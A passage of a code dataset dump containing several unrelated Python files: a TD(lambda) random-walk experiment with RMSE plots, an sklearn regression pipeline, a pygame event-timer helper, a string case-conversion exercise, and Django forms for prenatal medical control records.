fontsize=18)\n plt.ylabel('RMSE Error', fontsize=16)\n plt.title(\"Figure 5\")\n plt.show()\n \ndef plot_4rd_diagram(somelist,y):\n \n plt.figure(figsize=(10,10))\n new_lamda_vec=[lamda_vec[0],lamda_vec[2],lamda_vec[-2],lamda_vec[-1]]\n new_some_list=[somelist[0],somelist[2],somelist[-2],somelist[-1]]\n for i in new_some_list:\n x=new_lamda_vec[new_some_list.index(i)]\n x=str(x)\n\n plt.plot(y,i,label=r\"$\\lambda = $\"+x)\n \n plt.xlabel(r\"$\\alpha$\", fontsize=18)\n plt.ylabel('RMSE Error', fontsize=16)\n plt.title(\"Figure 4\")\n plt.legend()\n plt.show\n \n\ndef generate_a_dataset():\n statehistory_vector =[3]\n samples_of_winnins=[]\n for k in range (100):\n \n set_of_ten = []\n \n for s in range(10):\n \n currentStates = [0,0,0,1,0,0,0]\n statehistory_vector =[3]\n for i in range(1000):\n \n action=rand.choices(['right','left'])\n if action[0] =='left':\n \n value = currentstate(currentStates) -1\n currentStates=[0,0,0,0,0,0,0]\n currentStates[value]=1\n \n \n if action[0] =='right':\n \n value = currentstate(currentStates) +1\n currentStates=[0,0,0,0,0,0,0]\n currentStates[value]=1\n \n statehistory_vector.append(value)\n if value==0:\n \n break\n if value==6:\n \n break\n set_of_ten.append(statehistory_vector)\n \n samples_of_winnins.append(set_of_ten)\n return samples_of_winnins\ndef currentstate(vector):\n \n for i in range(len(vector)):\n if i== 1:\n return vector.index(i)\ndef P_t(weight,x_t):\n \n weight=np.array(weight)\n x_t=np.array(x_t)\n return np.dot(weight,x_t)\n\n \ndef into_unit_vector(value):\n if value == 0:\n print(\"it ended on the left\")\n return 0\n if value == 6:\n print(\"ended on the right\")\n return 1\n if value == 1:\n return np.array([1,0,0,0,0])\n if value == 2:\n return np.array([0,1,0,0,0])\n if value == 3:\n return np.array([0,0,1,0,0])\n if value == 4:\n return np.array([0,0,0,1,0])\n if value == 5:\n return np.array([0,0,0,0,1])\n \ndef rmse(predictions, targets):\n return np.sqrt(np.mean((predictions-targets)**2))\n\nmean_vec=[]\nlist_of_alpha_rmse=[]\nlist_of_list_tograph=[]\nsample_dataset=generate_a_dataset()\nideal_prediction = np.array([1/6,1/3,1/2,2/3,5/6])\nlamda_vec=[0,.2,.3,.4,.6,.8,1]\nsum_delta_t_vec=[]\ncounter=0\nepsilon=1\nalpha_vec=[0.01,.1,.2,.3,.4,.5,.58]\navg_weight_vec=[]\nrmse_to_plot_vec=[]\n\nweight=np.array([.5,.5,.5,.5,.5])\nrmse_vec=[]\nfor lamda in lamda_vec:\n for alpha in alpha_vec: \n alpha=alpha\n\n initial_weight=weight\n \n weight_t=initial_weight\n \n sum_delta_t_vec=[]\n epsilon=1\n avg_weight_vec=[]\n counter=0 \n \n lamda=lamda\n while True:\n \n for sample_set in sample_dataset:\n \n ##for updating weights for each 10 sequence\n # each sampleset is 10 sequence\n sum_delta_t_vec=[]\n for sequence in sample_set:\n t=0\n delta_t_vector=[]\n ## this while true iterates through the sequence computes Delta_t for a given sequence\n while True:\n \n sum_of_gradient_times_lamda=np.array([0,0,0,0,0])\n for k in range(t+1):\n sum_of_gradient_times_lamda=sum_of_gradient_times_lamda+ (lamda**(t-k))*into_unit_vector(\n sequence[k])\n \n if sequence[t+1]==6:\n p_t2=1\n elif sequence[t+1]==0:\n p_t2=0\n else:\n p_t2=P_t(initial_weight,into_unit_vector(sequence[t+1]))\n \n p_t1= P_t(initial_weight,into_unit_vector(sequence[t]))\n \n alpha_times_weights = alpha*(p_t2 - p_t1)\n \n delta_t_vector.append(alpha_times_weights*sum_of_gradient_times_lamda) \n if sequence[t+1]==6 or sequence[t+1]==0:\n sum_delta_t_vec.append(sum(delta_t_vector))\n someweight=initial_weight\n# \n initial_weight=initial_weight+ sum(sum_delta_t_vec)\n epsilon=(abs(sum(initial_weight)-sum(someweight)))\n sum_delta_t_vec=[]\n delta_t_vector=[]\n \n break\n t+=1\n ##update Weight\n \n rmse_vec.append(rmse(initial_weight,ideal_prediction))\n initial_weight=weight\n sum_delta_t_vec=[]\n delta_t_vector=[]\n counter+=1 \n if counter==100: \n break \n \n mean_vec.append(sum(rmse_vec)/len(rmse_vec))\n rmse_vec=[]\n \n if sum(mean_vec)/len(mean_vec)>1:\n \n list_of_alpha_rmse.append(float('NaN'))\n else: \n list_of_alpha_rmse.append(sum(mean_vec)/len(mean_vec))\n \n mean_vec=[]\n list_of_list_tograph.append(list_of_alpha_rmse)\n list_of_alpha_rmse=[]\n \n\n\n\n## Figure 5\nkm=list_of_list_tograph\n\nlist_of_list_tograph=km\n\nwinner_alpha_vecs=[]\nfor i in km:\n winner_alpha_vecs.append(min(i))\n\nlist_of_list_tograph=[]\nfor i in range(len(winner_alpha_vecs)):\n sample_dataset=generate_a_dataset()\n \n ideal_prediction = np.array([1/6,1/3,1/2,2/3,5/6])\n\n lamda_vec=[0,.2,.3,.4,.6,.8,1]\n\n sum_delta_t_vec=[]\n counter=0\n epsilon=1 \n avg_weight_vec=[]\n rmse_to_plot_vec=[]\n\n weight=np.array([.5,.5,.5,.5,.5])\n rmse_vec=[]\n mean_vec=[] \n alpha=winner_alpha_vecs[i] \n initial_weight=weight\n weight_t=initial_weight \n sum_delta_t_vec=[] \n avg_weight_vec=[]\n lamda=lamda_vec[i]\n \n while True:\n for sample_set in sample_dataset:\n \n ##for updating weights for each 10 sequence\n # each sampleset is 10 sequence\n sum_delta_t_vec=[]\n for sequence in sample_set:\n t=0\n delta_t_vector=[]\n ## this while true iterates through the sequence computes Delta_t for a given sequence\n while True:\n \n sum_of_gradient_times_lamda=np.array([0,0,0,0,0])\n for k in range(t+1):\n sum_of_gradient_times_lamda=sum_of_gradient_times_lamda+ (lamda**(t-k))*into_unit_vector(\n sequence[k])\n \n if sequence[t+1]==6:\n p_t2=1\n elif sequence[t+1]==0:\n p_t2=0\n else:\n p_t2=P_t(initial_weight,into_unit_vector(sequence[t+1]))\n \n p_t1= P_t(initial_weight,into_unit_vector(sequence[t]))\n \n alpha_times_weights = alpha*(p_t2 - p_t1)\n \n delta_t_vector.append(alpha_times_weights*sum_of_gradient_times_lamda) \n if sequence[t+1]==6 or sequence[t+1]==0:\n sum_delta_t_vec.append(sum(delta_t_vector))\n someweight=initial_weight\n ## u pdate weight vector\n initial_weight=initial_weight+ sum(sum_delta_t_vec)\n ##calculate RMSE\n rmse_vec.append(rmse(initial_weight,ideal_prediction))\n \n sum_delta_t_vec=[]\n delta_t_vector=[]\n\n break\n t+=1 \n counter+=1# \n if counter==100: \n break\n \n \n mean_vec.append(sum(rmse_vec)/len(rmse_vec))\n rmse_vec=[]\n\n if sum(mean_vec)/len(mean_vec)>1:\n \n list_of_alpha_rmse.append(float('NaN'))\n else: \n list_of_alpha_rmse.append(sum(mean_vec)/len(mean_vec))\n \n mean_vec=[]\n\n\nlist_of_list_tograph.append(list_of_alpha_rmse)\nlist_of_alpha_rmse=[]\n\n\n \n\n## graphing Figure 4\nplot_4rd_diagram(km,alpha_vec)\n\n## graph of Figure 5\nplot_3rd_diagram(lamda_vec,list_of_list_tograph[0])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Project1/figure4_and_figure5.py","file_name":"figure4_and_figure5.py","file_ext":"py","file_size_in_byte":9598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"213620928","text":"from sklearn.compose import ColumnTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split, GridSearchCV\n\n#\n# Dataset fields\n#\nnumeric_fields = [\"if\"+str(i) for i in range(1,14)]\ncategorical_fields = [\"cf\"+str(i) for i in range(1,27)] + [\"day_number\"]\n\n\nfields = [\"id\", \"label\"] + numeric_fields + categorical_fields\n\n#\n# Model pipeline\n#\n\n# We create the preprocessing pipelines for both numeric and categorical data.\n#numeric_features = ['CLEANLINESS', 'ROOM', 'SERVICE', 'LOCATION']\nnumeric_features = fields[2:15]\nnumeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())\n])\n\n#categorical_features = ['city', 'country']\n#так будет плохо кажется\ncategorical_features = fields[15:]\ncategorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='constant', fill_value='missing')),\n ('onehot', OneHotEncoder(handle_unknown='ignore'))\n])\n\npreprocessor = ColumnTransformer(\n transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features)\n ]\n)\n\n# Now we have a full prediction pipeline.\nmodel = Pipeline(steps=[\n ('preprocessor', preprocessor),\n ('linearregression', LinearRegression())\n])\n\n\n\n\n","sub_path":"projects/0/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"380517322","text":"from threading import Thread, Timer as threadTimer\nfrom pygame import event as pyEvent, register_quit\nfrom pygame.fastevent import post as post_event\nfrom pygame.fastevent import init as fastevent_init\nfrom pygame import init as pygame_init\nfrom math import floor\n\n# By Gudni Natan Gunnarsson, 2017\n\n\nclass Timer(object):\n \"\"\"This is an internal class that handles individual timers.\n Use the BetterTimers class instead.\"\"\"\n\n def __init__(self, event, rate):\n '''Create the timer object'''\n self.__running = False\n self.__event = event\n self.__rate = rate\n self.__t = None\n fastevent_init()\n\n def _eventPoster(self, event, rate):\n '''Posts events at the specified rate via a threadTimer.'''\n e = pyEvent\n if type(event) is not e.EventType:\n event = e.Event(event)\n\n def post(event):\n if self.__running:\n post_event(event)\n postThread.run()\n if not postThread.daemon:\n postThread.daemon = True\n\n postThread = threadTimer(float(rate - 1) / 1000.0, post, args=(event,))\n postThread.daemon = True\n postThread.start()\n\n def start_timer(self):\n '''Start the event timer. Object will start to post events at a\n regular rate.\n '''\n if not self.__running:\n self.__t = Thread(\n target=self._eventPoster,\n args=(self.__event, self.__rate)\n )\n self.__t.daemon = True\n self.__running = True\n self.__t.start()\n\n def stop_timer(self):\n '''Stop the event timer if it was running'''\n if self.__running:\n self.__running = False\n self.__t.join()\n\n def change_rate(self, rate):\n '''Changes the timer rate and restarts it.'''\n self.__rate = rate\n\n self.stop_timer()\n self.start_timer()\n\n def get_event(self):\n return self.__event\n\n\nclass BetterTimers():\n def __init__(self):\n '''Makes a BetterTimers object. Call pygame.quit to end all timers.'''\n self.__timers = list()\n pygame_init()\n register_quit(self.end_all_timers)\n fastevent_init()\n\n def set_timer(self, event, rate, delay=0):\n '''Sets a timer for an event. Each event object will only have one\n timer associated with it. Setting a timers rate to 0 will stop it.'''\n if floor(delay) > 0:\n delayTimer = threadTimer(\n float(delay - 1) / 1000.0,\n self.set_timer,\n args=(event, rate)\n )\n delayTimer.daemon = True\n delayTimer.start()\n\n return\n\n t = Timer(event, rate)\n for e in self.__timers:\n if e.get_event() == event:\n if floor(rate) > 0:\n e.change_rate(rate)\n else:\n e.stop_timer()\n self.__timers.remove(e)\n return\n if floor(rate) > 0:\n t.start_timer()\n self.__timers.append(t)\n\n def stop_timer(self, event):\n '''Stops any timer associated to the given event.'''\n self.set_timer(event, 0)\n\n def end_all_timers(self):\n '''Stops all the timers'''\n for t in self.__timers:\n t.stop_timer()\n\n self.__timers = list()\n\n def __del__(self):\n self.end_all_timers()\n\n\ntimers = BetterTimers()\n","sub_path":"better_timers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"2966021","text":"'''\nCreated on 29 Jun 2019\n\n@author: Kamil\n'''\n'''\n\n Its a game which allows you to play with english sentences.\n User will enter a sentence in any format.(uppercase or lowercase or a mix of both)\n Program must convert the given sentence in google case .What is a google case style of sentence?[know_about_it_here:]( It is a style of writing where we replace all lower case letters into upper case letters leaving the initial of all the words).\n Subgoals:\n Program must then convert the given sentence in camel case.To know more about camel case click_here\n Sentence can be entered with any number of spaces.\n\nHint: If you are dealing with languages such as c then consider the sentences as the char array.\n'''\nclass ChangeTextTo():\n def __init__(self, text):\n self.text_to_change = text.strip().upper()\n \n def google_case(self):\n self.text = self.text_to_change\n self.text = self.text.split(' ')\n self.text = list(filter(None, self.text))\n for ind, word in enumerate(self.text):\n word = word.strip().replace(word[0], word[0].lower())\n self.text[ind] = word\n return ' '.join(self.text)\n \n def camel_case(self):\n self.text = self.text_to_change\n self.text = self.text.title().replace(' ', '')\n return self.text\n \ndef program():\n change_text = ChangeTextTo(' I got intern at geeksforgeeks')\n print(change_text.google_case())\n print(change_text.camel_case())\n \nif __name__ == '__main__':\n program()","sub_path":"google_case/google_case.py","file_name":"google_case.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"187167007","text":"# coding:utf-8\nfrom datetime import datetime\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.forms import inlineformset_factory\n\nfrom ubigeo.models import Departamento, Provincia\nfrom establecimientos.models import Establecimiento\nfrom partos.models import PartogramaMedicion,Ingreso\n\nfrom .models import Control, ExamenFisico, Laboratorio, Diagnostico, ExamenFisicoFetal\n\n\nclass ControlForm(forms.ModelForm):\n class Meta:\n model = Control\n exclude = (\n 'establecimiento', 'embarazo', 'paciente', 'visito_sintomas',\n 'visito_diagnostico', 'atencion_hora')\n labels = {\n 'fcf': u'',\n 'situacion': u'',\n 'presentacion': u'',\n 'posicion': u'',\n 'movimientos_fetales': u'',\n 'imc': u'IMC'\n }\n\n def __init__(self, *args, **kwargs):\n\n establecimiento_id = kwargs.pop('establecimiento_id')\n establecimiento_actual = Establecimiento.objects.get(id=establecimiento_id)\n super(ControlForm, self).__init__(*args, **kwargs)\n\n if establecimiento_actual.is_sistema_externo_admision:\n self.fields['proxima_cita'].widget = forms.HiddenInput()\n self.fields['proxima_cita'].required = False\n\n self.fields['eg_fum'].widget.attrs['readonly'] = 'True'\n self.fields['eg_ecografia'].widget.attrs['readonly'] = 'True'\n self.fields['eg_altura_uterina'].widget.attrs['readonly'] = 'True'\n self.fields['fecha_probable_parto_fum'].widget.attrs[\n 'readonly'] = 'True'\n self.fields['fecha_probable_parto_ecografia'].widget.attrs[\n 'readonly'] = 'True'\n self.fields['fecha_probable_parto_altura_uterina'].widget.attrs[\n 'readonly'] = 'True'\n self.fields['temperatura'].widget.attrs = {'step': 0.1}\n self.fields['altura_uterina'].required = False\n self.fields['fcf'].required = False\n self.fields['presion_sistolica'].required = True\n self.fields['presion_diastolica'].required = True\n\n if not self.data:\n self.fields['zika_departamento'].queryset = (\n Departamento.objects.filter(pais=self.instance.zika_pais))\n self.fields['zika_provincia'].queryset = (\n Provincia.objects.filter(\n departamento=self.instance.zika_departamento))\n\n def clean_atencion_fecha(self):\n fecha = self.cleaned_data.get('atencion_fecha', '')\n if fecha and isinstance(fecha, datetime) and \\\n self.instance.embarazo.controles.filter(\n atencion_fecha=fecha).exists():\n raise ValidationError(\n 'Ya existe registrado un control para esta fecha')\n return fecha\n\n def clean_proxima_cita(self):\n cita = self.cleaned_data['proxima_cita']\n if cita:\n\n atencion = self.cleaned_data.get('atencion_fecha')\n\n if not atencion:\n raise forms.ValidationError(\n u'La fecha de atención no puede se vacío.'\n )\n\n if cita <= atencion:\n raise forms.ValidationError(\n u'La fecha de la cita no puede ser menor o igual '\n u'a la fecha de atención')\n\n return cita\n\n def clean_altura_uterina(self):\n altura_uterina = self.cleaned_data['altura_uterina']\n\n '''\n if self.cleaned_data['eg_elegida'] == 'fum' and \\\n self.cleaned_data['eg_fum'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_fum'].split()[0])\n elif self.cleaned_data['eg_elegida'] == 'ecografia' and \\\n self.cleaned_data['eg_ecografia'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_ecografia'].split()[0])\n elif self.cleaned_data['eg_elegida'] == 'altura uterina' and \\\n self.cleaned_data['eg_altura_uterina'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_altura_uterina'].split()[0])\n else:\n edad_gestacional_semanas = None\n\n if edad_gestacional_semanas is not None:\n if edad_gestacional_semanas >= 12:\n if altura_uterina <= 0 or altura_uterina > 100:\n raise forms.ValidationError(\n u'La altura uterina debe ser un número positivo '\n 'de maximo 2 cifras')\n '''\n if altura_uterina:\n if altura_uterina <= 0 or altura_uterina >= 100:\n raise forms.ValidationError(\n u'La altura uterina debe ser un número positivo '\n 'de maximo 2 cifras')\n\n return altura_uterina\n\n '''def clean_fcf(self):\n fcf = self.cleaned_data['fcf']\n\n if self.cleaned_data['eg_elegida'] == 'fum' and \\\n self.cleaned_data['eg_fum'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_fum'].split()[0])\n elif self.cleaned_data['eg_elegida'] == 'ecografia' and \\\n self.cleaned_data['eg_ecografia'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_ecografia'].split()[0])\n elif self.cleaned_data['eg_elegida'] == 'altura uterina' and \\\n self.cleaned_data['eg_altura_uterina'].__len__() > 0:\n edad_gestacional_semanas = int(\n self.cleaned_data['eg_altura_uterina'].split()[0])\n else:\n edad_gestacional_semanas = None\n\n if edad_gestacional_semanas is not None:\n if edad_gestacional_semanas > 19:\n if fcf < 120 or fcf > 400:\n raise forms.ValidationError(\n u'Asegúrese de que este valor esta entre 120 y 400')\n\n return fcf'''\n\n def set_embarazo(self, embarazo):\n self.instance.embarazo = embarazo\n\n\nclass ExamenFisicoFetalForm(forms.ModelForm):\n control = None\n eliminado = eliminado = forms.CharField(widget=forms.HiddenInput(),\n required=False) # forms.BooleanField(initial=False, required= False)\n\n class Meta:\n model = ExamenFisicoFetal\n\n labels = {\n 'fcf': u'',\n 'situacion': u'',\n 'presentacion': u'',\n 'posicion': u'',\n 'movimientos_fetales': u'',\n 'visible': u'',\n }\n\n def __init__(self, *args, **kwargs):\n super(ExamenFisicoFetalForm, self).__init__(*args, **kwargs)\n\n def get_eliminado(self):\n return self['eliminado'].value()\n\n def set_control(self, control):\n\n self.control = control\n\n def clean_fcf(self):\n\n fcf = self.cleaned_data['fcf']\n\n if self.get_eliminado():\n return fcf\n\n if self.control:\n control = self.control\n else:\n control = self.instance.control\n\n eg_elegida = control.eg_elegida\n\n if eg_elegida == 'fum' and \\\n control.eg_fum.__len__() > 0:\n edad_gestacional_semanas = int(\n control.eg_fum.split()[0])\n elif eg_elegida == 'ecografia' and \\\n control.eg_ecografia.__len__() > 0:\n edad_gestacional_semanas = int(\n control.eg_ecografia.split()[0])\n elif eg_elegida == 'altura uterina' and \\\n control.eg_altura_uterina.__len__() > 0:\n edad_gestacional_semanas = int(\n control.eg_altura_uterina.split()[0])\n else:\n edad_gestacional_semanas = None\n\n if edad_gestacional_semanas is not None:\n if edad_gestacional_semanas > 19:\n if fcf < 120 or fcf > 400:\n raise forms.ValidationError(u'Asegúrese de que este valor esta entre 120 y 400')\n # self.add_error('fcf','Asegúrese de que este valor esta entre 120 y 400')\n\n return fcf\n\n\nExamenFisicoFetalFormSet = inlineformset_factory(Control, ExamenFisicoFetal, form=ExamenFisicoFetalForm, min_num=1,\n max_num=5, extra=0)\n\n\nclass ExamenFisicoForm(forms.ModelForm):\n BOOLEAN_CHOICES = (\n (True, u'Si'),\n (False, u'No'),\n (None, u'N/A')\n )\n\n piel_y_mucosas = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n mamas = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n respiratorio = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n cardiovascular = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n odontologico = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n abdomen = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n urinario = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n neurologico = forms.ChoiceField(\n choices=ExamenFisico.CN_CHOICES, widget=forms.RadioSelect)\n pelvimetria = forms.ChoiceField(\n choices=ExamenFisico.PELVIMETRIA_CHOICES, widget=forms.RadioSelect)\n examen_ginecologico = forms.ChoiceField(\n label=u'Examen Gineco-Obstétrico', choices=BOOLEAN_CHOICES,\n widget=forms.RadioSelect, initial=None)\n especuloscopia = forms.ChoiceField(\n label=u'Especuloscopia', choices=BOOLEAN_CHOICES,\n widget=forms.RadioSelect, initial=None)\n tv_cambio_cervicales = forms.ChoiceField(\n label=u'Cambios cervicales', choices=BOOLEAN_CHOICES,\n widget=forms.RadioSelect, initial=None)\n\n tv_tb_consistencia = forms.ChoiceField(\n label=u'Consistencia', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_CONSISTENCIA_CHOICES, required=False)\n tv_tb_posicion = forms.ChoiceField(\n label=u'Posición', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_POSICION_CHOICES, required=False)\n tv_tb_borramiento = forms.ChoiceField(\n label=u'Borramiento', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_BORRAMIENTO_CHOICES, required=False)\n tv_tb_dilatacion = forms.ChoiceField(\n label=u'Dilatación', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_DILATACION_CHOICES, required=False)\n tv_tb_altura_presentacion = forms.ChoiceField(\n label=u'Altura presentación', widget=forms.RadioSelect,\n choices=ExamenFisico.TB_ALTURA_PRESENTACION_CHOICES, required=False)\n\n eg_dolor = forms.ChoiceField(\n label=u'Dolor', choices=ExamenFisico.DOLOR_CHOICES,\n widget=forms.RadioSelect, initial=ExamenFisico.N_A)\n eg_posicion = forms.ChoiceField(\n label=u'Posición', choices=ExamenFisico.POSICION_CHOICES,\n widget=forms.RadioSelect)\n eg_restos = forms.ChoiceField(\n label=u'Restos', choices=ExamenFisico.RESTOS_CHOICES,\n widget=forms.RadioSelect)\n eg_culdocentesis = forms.ChoiceField(\n label=u'Culdocentesis', choices=BOOLEAN_CHOICES,\n widget=forms.RadioSelect)\n eg_fondo_de_saco = forms.ChoiceField(\n label=u'Fondo de saco', choices=ExamenFisico.FONDO_DE_SACO_CHOICES,\n widget=forms.RadioSelect)\n eg_mal_olor = forms.ChoiceField(\n label=u'Mal olor', choices=BOOLEAN_CHOICES, widget=forms.RadioSelect)\n\n tb_fields = (\n 'tv_tb_consistencia', 'tv_tb_posicion', 'tv_tb_borramiento',\n 'tv_tb_dilatacion', 'tv_tb_altura_presentacion', 'tv_tb_resultado')\n\n def clean_tv_tb_resultado(self):\n flag = True\n if self.cleaned_data['tv_tb_aplica']:\n for field in self.tb_fields:\n value = self.cleaned_data[field]\n flag = bool(value) and flag\n if not flag:\n raise forms.ValidationError(\n 'Si Test de Bishop aplica debe llenar todos '\n 'los campos de Test de Bishop')\n else:\n for field in self.tb_fields:\n self.cleaned_data[field] = None\n return self.cleaned_data['tv_tb_resultado']\n\n class Meta:\n model = ExamenFisico\n exclude = ('control',)\n labels = {\n 'tv_altura_presentacion': u'Descenso cefálico'\n }\n\n\nclass LaboratorioForm(forms.ModelForm):\n grupo = forms.ChoiceField(\n label=u'Grupo', choices=Laboratorio.GRUPO_CHOICES,\n widget=forms.RadioSelect, required=False)\n factor = forms.ChoiceField(\n label=u'Factor RH', choices=Laboratorio.FACTOR_CHOICES,\n widget=forms.RadioSelect, required=False)\n\n glicemia_1 = forms.ChoiceField(\n label=u'Glicemia 1', choices=Laboratorio.NORMAL_ANORMAL_NO_SE_HIZO,\n widget=forms.RadioSelect)\n glicemia_2 = forms.ChoiceField(\n label=u'Glicemia 2', choices=Laboratorio.NORMAL_ANORMAL_NO_SE_HIZO,\n widget=forms.RadioSelect)\n tolerancia_glucosa = forms.ChoiceField(\n label=u'Tolerancia glucosa',\n choices=Laboratorio.NORMAL_ANORMAL_CHOICES, widget=forms.RadioSelect)\n\n rapida_proteinuria = forms.ChoiceField(\n label=u'Prueba rápida de Proteinuria',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect, initial=Laboratorio.NO_SE_HIZO)\n rapida_proteinuria_2 = forms.ChoiceField(\n label=u'Prueba rápida de Proteinuria',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect, initial=Laboratorio.NO_SE_HIZO)\n rapida_proteinuria_3 = forms.ChoiceField(\n label=u'Prueba rápida de Proteinuria',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect, initial=Laboratorio.NO_SE_HIZO)\n\n vdrl_rp_1 = forms.ChoiceField(\n label=u'VDRL/RPR 1',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n vdrl_rp_2 = forms.ChoiceField(\n label=u'VDRL/RPR 2', choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n fta_abs = forms.ChoiceField(\n label=u'FTA Abs', choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n tpha = forms.ChoiceField(\n label=u'THPA', choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n rapida_sifilis = forms.ChoiceField(\n label=u'Primera prueba rápida sífilis',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n rapida_sifilis_2 = forms.ChoiceField(\n label=u'Segunda prueba rápida sífilis',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n rapida_vih_1 = forms.ChoiceField(\n label=u'Primera prueba rápida VIH',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n rapida_vih_2 = forms.ChoiceField(\n label=u'Segunda prueba rápida VIH',\n choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n elisa = forms.ChoiceField(\n label=u'ELISA VIH', choices=Laboratorio.REACTIVO_NO_REACTIVO_CHOICES,\n widget=forms.RadioSelect)\n\n ifi_western_blot = forms.ChoiceField(\n label=u'IFI/Western Blot',\n choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n htlv_1 = forms.ChoiceField(\n label=u'HTLV 1', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n torch = forms.ChoiceField(\n label=u'TORCH', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n pcr_zika = forms.ChoiceField(\n label=u'PCR Zika', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n gota_gruesa = forms.ChoiceField(\n label=u'Gota gruesa', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n malaria_prueba_rapida = forms.ChoiceField(\n label=u'Malaria prueba rápida',\n choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n fluorencia_malaria = forms.ChoiceField(\n label=u'Fluorescencia malaria',\n choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n examen_completo_orina_1 = forms.ChoiceField(\n label=u'Examen completo orina 1',\n choices=Laboratorio.POSITIVO_NEGATIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n examen_completo_orina_2 = forms.ChoiceField(\n label=u'Examen completo orina 2',\n choices=Laboratorio.POSITIVO_NEGATIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n\n leucocituria = forms.ChoiceField(\n label=u'Leucocituria',\n choices=Laboratorio.POSITIVO_NEGATIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n nitritos = forms.ChoiceField(\n label=u'Nitritos', choices=Laboratorio.POSITIVO_NEGATIVO_NO_SE_HIZO,\n widget=forms.RadioSelect)\n urocultivo = forms.ChoiceField(\n label=u'Urocultivo', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n bk_en_esputo = forms.ChoiceField(\n label=u'BK en esputo', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n listeria = forms.ChoiceField(\n label=u'Listeria', choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n tamizaje_hepatitis_b = forms.ChoiceField(\n label=u'Tamizaje hepatitis B',\n choices=Laboratorio.POSITIVO_NEGATIVO_CHOICES,\n widget=forms.RadioSelect)\n\n pap = forms.ChoiceField(\n label=u'PAP', choices=Laboratorio.NORMAL_ANORMAL_NO_SE_HIZO,\n widget=forms.RadioSelect)\n iva = forms.ChoiceField(\n label=u'IVA', choices=Laboratorio.NORMAL_ANORMAL_CHOICES,\n widget=forms.RadioSelect)\n colposcopia = forms.ChoiceField(\n label=u'Colposcopia', choices=Laboratorio.NORMAL_ANORMAL_CHOICES,\n widget=forms.RadioSelect)\n\n class Meta:\n model = Laboratorio\n exclude = ('control', 'embarazo', 'paciente')\n\n def __init__(self, *args, **kwargs):\n super(LaboratorioForm, self).__init__(*args, **kwargs)\n\n atributos = {'class': 'hemoglobina', 'step': 0.01}\n\n 